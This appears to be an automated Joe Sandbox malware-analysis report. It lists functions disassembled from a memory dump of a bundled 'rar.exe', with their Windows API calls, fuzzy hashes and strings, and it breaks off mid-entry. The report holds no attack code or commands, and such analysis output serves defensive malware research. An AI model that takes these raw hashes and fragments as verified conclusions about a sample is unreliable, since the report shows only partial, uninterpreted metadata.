Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: ExceptionThrowstd::bad_alloc::bad_alloc
String ID:
API String ID: 932687459-0
Opcode ID: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
Instruction ID: 59d26737b7b8dd7d76b83bb693394dbeef7ddc40e99d617ccf2429abf6e6de07
Opcode Fuzzy Hash: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
Instruction Fuzzy Hash: 2E419459A0DAC285EB51BA21D1903FDA390EB50B84F9C4533DB9E067DADF6CE44783B0

Function 00007FF7F7EE5120 Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F7EE5173
WideCharToMultiByte.KERNEL32 ref: 00007FF7F7EE5245
GetLastError.KERNEL32 ref: 00007FF7F7EE5268
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F7EE529A

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
String ID:
API String ID: 4141327611-0
Opcode ID: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
Instruction ID: da227e36cd5463509f99be2aa7dbb755506f2431a339670e4867175a3668ba2d
Opcode Fuzzy Hash: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
Instruction Fuzzy Hash: 3241072990CB4246FB61AB50985037DE3A0EF44B90F964932DE6E47BD5CF3CD44387A2

Function 00007FF7F7E9D048 Relevance: 6.1, APIs: 4, Instructions: 77fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00007FF7F7E886CB,?,?,?,00007FF7F7E8A5CB,?,?,00000000,?,?,00000040,?,?,00007FF7F7E82DF9), ref: 00007FF7F7E9D09D
CreateFileW.KERNEL32(?,00007FF7F7E886CB,?,?,?,00007FF7F7E8A5CB,?,?,00000000,?,?,00000040,?,?,00007FF7F7E82DF9), ref: 00007FF7F7E9D0E5
CreateFileW.KERNEL32(?,00007FF7F7E886CB,?,?,?,00007FF7F7E8A5CB,?,?,00000000,?,?,00000040,?,?,00007FF7F7E82DF9), ref: 00007FF7F7E9D114
CreateFileW.KERNEL32(?,00007FF7F7E886CB,?,?,?,00007FF7F7E8A5CB,?,?,00000000,?,?,00000040,?,?,00007FF7F7E82DF9), ref: 00007FF7F7E9D15C

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
Instruction ID: 0671cd2f46979b1c3d8f63ed2a6a9d5b369529771e517d377bb16b14048f6e70
Opcode Fuzzy Hash: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
Instruction Fuzzy Hash: C5316336618B4582E7609F11E5547AAB7A0F789BA8F904325EABD07BC8CF3CD5058B50

Function 00007FF7F7EA3A70 Relevance: 6.1, APIs: 4, Instructions: 74fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,00007FF7F7EA11B0,?,?,?,00000000,?,?,00007FF7F7E9F30F,00000000,00007FF7F7E86380,?,00007FF7F7E82EC8), ref: 00007FF7F7EA3AC4
CreateFileW.KERNEL32(?,?,?,00007FF7F7EA11B0,?,?,?,00000000,?,?,00007FF7F7E9F30F,00000000,00007FF7F7E86380,?,00007FF7F7E82EC8), ref: 00007FF7F7EA3B0A
DeviceIoControl.KERNEL32 ref: 00007FF7F7EA3B55
CloseHandle.KERNEL32(?,?,?,00007FF7F7EA11B0,?,?,?,00000000,?,?,00007FF7F7E9F30F,00000000,00007FF7F7E86380,?,00007FF7F7E82EC8), ref: 00007FF7F7EA3B60

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: CreateFile$CloseControlDeviceHandle
String ID:
API String ID: 998109204-0
Opcode ID: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
Instruction ID: e415a99b9b19347835c3d2b6d2e1dd550ef87c3d604f544446aab9a64097d5d9
Opcode Fuzzy Hash: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
Instruction Fuzzy Hash: C0318336618B8186E7609F51B444A9AB7A4FB847F4F504336EEBA03BD4CF3CD5568B40

Function 00007FF7F7ECB4EC Relevance: 6.0, APIs: 4, Instructions: 44threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7F7ECB549
SetPriorityClass.KERNEL32 ref: 00007FF7F7ECB554
GetCurrentThread.KERNEL32 ref: 00007FF7F7ECB55A
SetThreadPriority.KERNEL32 ref: 00007FF7F7ECB565

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: CurrentPriorityThread$ClassProcess
String ID:
API String ID: 1171435874-0
Opcode ID: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
Instruction ID: bbce9867137215b92b98f786fd8f7093018562db17bf976b1d80ab31f3014ee7
Opcode Fuzzy Hash: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
Instruction Fuzzy Hash: CA11337DE1865286E754A710948427CB352EB44754FE04036CB2B17AC1DF2CBC47C6A4

Function 00007FF7F7EE5630 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7F7EDF3FC,?,?,?,00007FF7F7EE143D), ref: 00007FF7F7EE563A
SetLastError.KERNEL32(?,?,?,00007FF7F7EDF3FC,?,?,?,00007FF7F7EE143D), ref: 00007FF7F7EE56A2
SetLastError.KERNEL32(?,?,?,00007FF7F7EDF3FC,?,?,?,00007FF7F7EE143D), ref: 00007FF7F7EE56B8
abort.LIBCMT ref: 00007FF7F7EE56BE

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: ErrorLast$abort
String ID:
API String ID: 1447195878-0
Opcode ID: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
Instruction ID: 44df4373a0d5896c2601341a76d8ba783ee3e64800fd2e1830551bac8dbc5599
Opcode Fuzzy Hash: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
Instruction Fuzzy Hash: C4018C28B0960343FB58B7719A65178D3915F48790FD60D3AE93F06BD6ED2CE84742B2

Function 00007FF7F7ECB850 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F7ECBBFC: ResetEvent.KERNEL32 ref: 00007FF7F7ECBC15
Part of subcall function 00007FF7F7ECBBFC: ReleaseSemaphore.KERNEL32 ref: 00007FF7F7ECBC2B

ReleaseSemaphore.KERNEL32 ref: 00007FF7F7ECB887
CloseHandle.KERNEL32 ref: 00007FF7F7ECB8A8
DeleteCriticalSection.KERNEL32 ref: 00007FF7F7ECB8C0
CloseHandle.KERNEL32 ref: 00007FF7F7ECB8CE

Part of subcall function 00007FF7F7ECB974: WaitForSingleObject.KERNEL32 ref: 00007FF7F7ECB97B
Part of subcall function 00007FF7F7ECB974: GetLastError.KERNEL32 ref: 00007FF7F7ECB986

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 502429940-0
Opcode ID: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
Instruction ID: dbecfd863162d4d3791f2a4377d502c8a93554c355eb257ff13d74de6fe4c7f6
Opcode Fuzzy Hash: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
Instruction Fuzzy Hash: 8311733A614A5196E314AB20E944599B320F785790F800232D77E136E5CF3DE466C794

Function 00007FF7F7EE58A4 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F7EE5908

Strings

gfffffff, xrefs: 00007FF7F7EE5B96

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: gfffffff
API String ID: 3215553584-1523873471
Opcode ID: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
Instruction ID: 2b994c3061be460abc1b5e855ca769622b0d4017c57ba3de9fa2d07cd194c6ac
Opcode Fuzzy Hash: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
Instruction Fuzzy Hash: F9915866B093C686EB219F2995903BCAB55AB21BD0F458532CBAE073D5DE3CE103C352

Function 00007FF7F7EBCFCF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F7ECB6D0: Sleep.KERNEL32(?,?,?,?,00007FF7F7E9CBED,?,00000000,?,00007FF7F7EC7A8C), ref: 00007FF7F7ECB730

new.LIBCMT ref: 00007FF7F7EBCFD9

Strings

rar, xrefs: 00007FF7F7EBD074
rev, xrefs: 00007FF7F7EBD00F

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: Sleep
String ID: rar$rev
API String ID: 3472027048-2145959568
Opcode ID: 08831a3cfeaaf9fb24c2338f7730f8046a6b3526762b21c2fc697142a1aad8eb
Instruction ID: b6eef9d9aa40c691686785afde00c314b23a7eb358fc62d0bfcdd6cf83025018
Opcode Fuzzy Hash: 08831a3cfeaaf9fb24c2338f7730f8046a6b3526762b21c2fc697142a1aad8eb
Instruction Fuzzy Hash: 91A1F82AA0969241EB18FB2CD4542BCAB65FF44784FC54233DA7F076D6DE2CE546C3A0

Function 00007FF7F7EDF7CC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F7EDF7FE
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F7EDFA3C

Strings

*, xrefs: 00007FF7F7EDF90C

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: *
API String ID: 3215553584-163128923
Opcode ID: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
Instruction ID: 0fa7b8c0bb090667ae5ab80a3bea2c2b794948194baeb34d4495bf1fb373fd6c
Opcode Fuzzy Hash: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
Instruction Fuzzy Hash: 3771617AD0961296E764EF6880910BCB7A1FB05F08FA91137DA3B462D4DF3DD482C7A1

Function 00007FF7F7EE5CD4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F7EE5D17

Strings

gfff, xrefs: 00007FF7F7EE5E42
e+000, xrefs: 00007FF7F7EE5DBF

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: e+000$gfff
API String ID: 3215553584-3030954782
Opcode ID: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
Instruction ID: 38f7ce12f81a280c85ae90ec85e2744c591ee44b40bfb5337b5cfbb834781b49
Opcode Fuzzy Hash: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
Instruction Fuzzy Hash: AE519866B187C286E7249B349840369BB81EB40B90F88C632C7BE8BBD5CF2CD006C711

Function 00007FF7F7EB4534 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(?,?,?,00000800,?,?,00000000,00007FF7F7EA475B,?,00000000,?,?,00007FF7F7EA4620,?,00000000,?), ref: 00007FF7F7EB4633

Strings

\\?\, xrefs: 00007FF7F7EB45B6, 00007FF7F7EB4602, 00007FF7F7EB4684, 00007FF7F7EB46D3
UNC, xrefs: 00007FF7F7EB4614

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: CurrentDirectory
String ID: UNC$\\?\
API String ID: 1611563598-253988292
Opcode ID: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
Instruction ID: a10340a53ebf2a16b284ce688299ebb1cb1e03b66b7cf6ae14c8c93f6be8f163
Opcode Fuzzy Hash: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
Instruction Fuzzy Hash: CC41B94EA0968240EB207B5DE4415B997516F067C4FC18233DDBF476DAEE3CE94BC2A0

Function 00007FF7F7EE3B0C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F7EE3B36
GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FF7F7EDB066), ref: 00007FF7F7EE3B57

Strings

C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe, xrefs: 00007FF7F7EE3B45

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: FileModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe
API String ID: 3307058713-2403995809
Opcode ID: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
Instruction ID: fdd62f4cac9fe654fb44431294ba06d0e61b07a226efad18f01ced0e610d4497
